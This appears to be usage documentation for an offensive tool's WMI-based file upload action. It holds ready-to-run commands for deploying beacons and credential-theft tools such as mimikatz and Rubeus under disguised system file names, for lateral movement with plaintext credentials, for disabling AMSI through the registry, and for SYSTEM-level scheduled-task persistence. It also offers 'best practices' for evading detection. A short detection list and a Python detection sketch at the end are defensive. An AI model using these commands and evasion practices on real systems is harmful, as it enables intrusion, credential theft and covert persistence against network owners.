Overview

The upload action transfers files to remote systems using WMI class properties as a data channel. This provides file upload capabilities without requiring SMB access or file shares.
File upload via WMI is useful when SMB ports are blocked or file share access is monitored. It operates entirely over WMI/RPC channels.

Syntax

SharpWMI.exe action=upload [computername=HOST[,HOST2,...]] source="LOCAL_PATH" dest="REMOTE_PATH" [amsi=disable] [username=DOMAIN\user] [password=Password]

Parameters

Parameter     Required  Description
action        Yes       Must be upload
source        Yes       Local file path to upload
dest          Yes       Destination path on remote system
computername  No        Target host(s), comma-separated
amsi          No        Set to disable to bypass AMSI during upload
username      No        Username for authentication
password      No        Password for authentication

How It Works

1. Read Source File: reads the local file and converts it to a byte array.
2. Create WMI Class: creates a temporary WMI class, Win32_OSRecoveryConfigurationData.
3. Store in Property: stores the file bytes as a comma-separated string in the DebugOptions property.
4. Remote Retrieval: executes PowerShell on the target to read the property from the WMI class and write the bytes to disk.
5. Verification: queries CIM_DataFile to verify the file was created.
6. Cleanup: removes the temporary WMI class.

Usage Examples

Basic File Upload

SharpWMI.exe action=upload computername=target.domain.com source="beacon.exe" dest="C:\Windows\temp\svchost.exe"

Example Output

  Scope: \\target.domain.com\root\cimv2
  User credentials: DOMAIN\admin

[*] Uploading file via evil WMI static class' property: DebugOptions ...
[*] Pulling contents from WMI repository to disk on a remote machine...

[*] Host                           : target.domain.com
[*] Command                        : powershell -w hidden -nop -c "$e=([WmiClass]'root\cimv2:Win32_OSRecoveryConfigurationData').Properties['DebugOptions'].Value;[IO.File]::WriteAllBytes('C:\Windows\temp\svchost.exe',[Byte[]][Int[]]($e-split','))"
[*] Creation of process returned   : 0
[*] Process ID                     : 3456

[*] Confirming whether file was uploaded...
[*] Removing evil WMI class Win32_OSRecoveryConfigurationData

[+] SUCCESS: File uploaded: svchost.exe

Operational Scenarios

Scenario 1: Beacon Deployment

# 1. Upload beacon
SharpWMI.exe action=upload computername=target.domain.com source="beacon.exe" dest="C:\Windows\temp\svchost.exe" amsi=disable

# 2. Execute beacon
SharpWMI.exe action=exec computername=target.domain.com command="C:\Windows\temp\svchost.exe"

# 3. Verify execution
SharpWMI.exe action=ps computername=target.domain.com

Scenario 2: Tool Staging

# Upload multiple tools
SharpWMI.exe action=upload computername=target.domain.com source="SharpHound.exe" dest="C:\temp\process.exe" amsi=disable

SharpWMI.exe action=upload computername=target.domain.com source="Rubeus.exe" dest="C:\temp\system.exe" amsi=disable

SharpWMI.exe action=upload computername=target.domain.com source="SharpDPAPI.exe" dest="C:\temp\service.exe" amsi=disable

Scenario 3: Lateral Movement Chain

# Upload to multiple systems
SharpWMI.exe action=upload computername=ws01,ws02,ws03,ws04,ws05 source="lateral.exe" dest="C:\Windows\temp\update.exe" amsi=disable username="DOMAIN\admin" password="Password123!"

# Execute on all systems
SharpWMI.exe action=exec computername=ws01,ws02,ws03,ws04,ws05 command="C:\Windows\temp\update.exe -c 192.168.1.100" username="DOMAIN\admin" password="Password123!"

Scenario 4: Persistence Deployment

# Upload persistence payload
SharpWMI.exe action=upload computername=target.domain.com source="persist.exe" dest="C:\Windows\System32\WindowsUpdate.exe" amsi=disable

# Create scheduled task for persistence
SharpWMI.exe action=exec computername=target.domain.com command="schtasks /create /tn WindowsUpdateCheck /tr C:\Windows\System32\WindowsUpdate.exe /sc onlogon /ru SYSTEM" result=true

File Size Considerations

Large files may cause issues with WMI property size limits and memory constraints. Test with your specific file sizes.

Recommendations:
  • Keep files under 10 MB when possible
  • Test upload with small files first
  • Use compression for larger payloads
  • Consider staging larger files via other methods

For files larger than 10 MB:
  1. Compress the file before upload
  2. Upload compressed file via WMI
  3. Extract on target using PowerShell
  4. Clean up compressed file

# Upload compressed payload
SharpWMI.exe action=upload computername=target source="payload.zip" dest="C:\temp\data.zip" amsi=disable

# Extract on target
SharpWMI.exe action=exec computername=target command="powershell -c Expand-Archive C:\temp\data.zip C:\temp\" result=true

Destination Path Guidelines

Writeable Locations

Recommended destination paths:
  • C:\Windows\temp\
  • C:\temp\
  • %APPDATA%\
  • C:\ProgramData\

Avoid Protected Paths

Paths that may fail:
  • C:\Program Files\ (requires admin)
  • C:\Windows\System32\ (protected)
  • Root of C:\ drive
  • User profile without proper access

Remote vs Local Usage

Local Upload

# Upload to localhost (rare use case)
SharpWMI.exe action=upload source="file.exe" dest="C:\temp\file.exe"

Note: Local uploads are uncommon. Use standard file copy for local operations.

AMSI Evasion

When amsi=disable is specified, SharpWMI:
  1. Modifies registry to disable AMSI: HKCU\Software\Microsoft\Windows Script\Settings\AmsiEnable = 0
  2. Executes PowerShell command to write file
  3. Restores original AMSI setting

SharpWMI.exe action=upload computername=target.domain.com source="mimikatz.exe" dest="C:\temp\debug.exe" amsi=disable

Detection Considerations

  • Creation of Win32_OSRecoveryConfigurationData class
  • Unusual WMI class with large property values
  • Temporary WMI class creation and deletion
  • Event ID 5857-5861: WMI activity
  • PowerShell spawned by wmiprvse.exe
  • Command line with [IO.File]::WriteAllBytes
  • WMI class property read operations
  • Event ID 4104: PowerShell script block logging
  • File written to temp directories
  • File creation by PowerShell
  • Suspicious file names (svchost.exe, system.exe in temp)
  • Event ID 4663: File system access
  • Large data transfer over WMI/DCOM
  • Unusual WMI property queries
  • Multiple WMI operations in sequence
  • DCOM traffic on port 135
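As an added illustration (not part of SharpWMI or this page), the following Python applies a few of the indicators listed above to constructed sample events; the event field names, log shapes and rule names are assumptions made for the example.

```python
import re

# Constructed sample events (not real logs), shaped loosely like Sysmon process-creation
# and registry-value-set records. Field names are assumptions for this example.
UPLOAD_CMDLINE = (
    'powershell -w hidden -nop -c "$e=([WmiClass]'
    "'root\\cimv2:Win32_OSRecoveryConfigurationData').Properties['DebugOptions'].Value;"
    "[IO.File]::WriteAllBytes('C:\\Windows\\temp\\svchost.exe',[Byte[]][Int[]]($e-split','))\""
)
SAMPLE_EVENTS = [
    {"type": "process", "parent": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": UPLOAD_CMDLINE},
    {"type": "process", "parent": "C:\\Windows\\explorer.exe",  # benign interactive use
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell -c Get-Process"},
    {"type": "registry", "key": "HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable",
     "value": "0"},
]

# Each rule maps one indicator from the detection list to a predicate over a single event.
RULES = [
    ("ps_spawned_by_wmiprvse", lambda e: e["type"] == "process"
        and e["parent"].lower().endswith("\\wmiprvse.exe")
        and e["image"].lower().endswith("\\powershell.exe")),
    ("writeallbytes_on_cmdline", lambda e: e["type"] == "process"
        and "[io.file]::writeallbytes" in e["cmdline"].lower()),
    ("wmi_class_property_read", lambda e: e["type"] == "process"
        and re.search(r"\[WmiClass\].*Win32_OSRecoveryConfigurationData.*\.Properties\[",
                      e["cmdline"], re.I) is not None),
    ("amsienable_set_to_0", lambda e: e["type"] == "registry"
        and e["key"].lower().endswith("\\windows script\\settings\\amsienable")
        and e["value"].strip() == "0"),
]

def evaluate(events):
    """Return {event_index: [matched rule ids]} for every event hitting at least one rule."""
    hits = {}
    for i, ev in enumerate(events):
        matched = [rid for rid, pred in RULES if pred(ev)]
        if matched:
            hits[i] = matched
    return hits

def severity(rule_ids):
    """Two or more indicators on one event is strong evidence of the WMI upload pattern."""
    return "high" if len(rule_ids) >= 2 else "medium"
```

Calling evaluate(SAMPLE_EVENTS) flags event 0 on three rules (high) and event 2 on one rule (medium); the explorer-spawned Get-Process event is not flagged.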

Best Practices

File Naming

  • Use legitimate-sounding names
  • Match existing system files
  • Avoid obvious malware names
  • Examples: svchost.exe, system.exe, update.exe

Path Selection

  • Use temp directories
  • Avoid monitored paths
  • Match legitimate file locations
  • Clean up after use

Operational Security

  • Always use amsi=disable
  • Test upload with small files first
  • Verify upload success before execution
  • Delete uploaded files after use

Error Handling

  • Check for SUCCESS/FAILURE messages
  • Verify file exists before execution
  • Handle upload timeouts
  • Monitor for AV detection

Troubleshooting

Cause: File not written to disk or verification failed
Solution:
  • Check destination path is writeable
  • Verify sufficient disk space
  • Ensure PowerShell is available
  • Check AV didn't quarantine file
  • Try different destination path

Cause: WMI class creation failed
Solution:
  • Verify WMI service is running
  • Check admin privileges
  • Try smaller file size
  • Ensure sufficient system resources

Cause: Insufficient privileges
Solution:
  • Verify admin credentials
  • Check UAC remote restrictions
  • Ensure user can write to destination
  • Try with domain admin account

Cause: Large file or network issue
Solution:
  • Reduce file size
  • Check network connectivity
  • Compress file before upload
  • Increase timeout if possible

Cleanup

After successful operations, clean up uploaded files:

# Remove uploaded file via exec
SharpWMI.exe action=exec computername=target.domain.com command="cmd /c del C:\Windows\temp\svchost.exe" result=true

# Or via PowerShell
SharpWMI.exe action=exec computername=target.domain.com command="powershell -c Remove-Item C:\temp\*.exe -Force" result=true amsi=disable

Alternative Methods

Alternatives to WMI upload include SMB File Copy and PowerShell Remoting.

WMI Upload (SharpWMI)

Advantages:
  • No SMB required
  • Works over WMI/RPC only
  • Evades SMB monitoring
Disadvantages:
  • Slower than SMB
  • File size limitations
  • More complex detection artifacts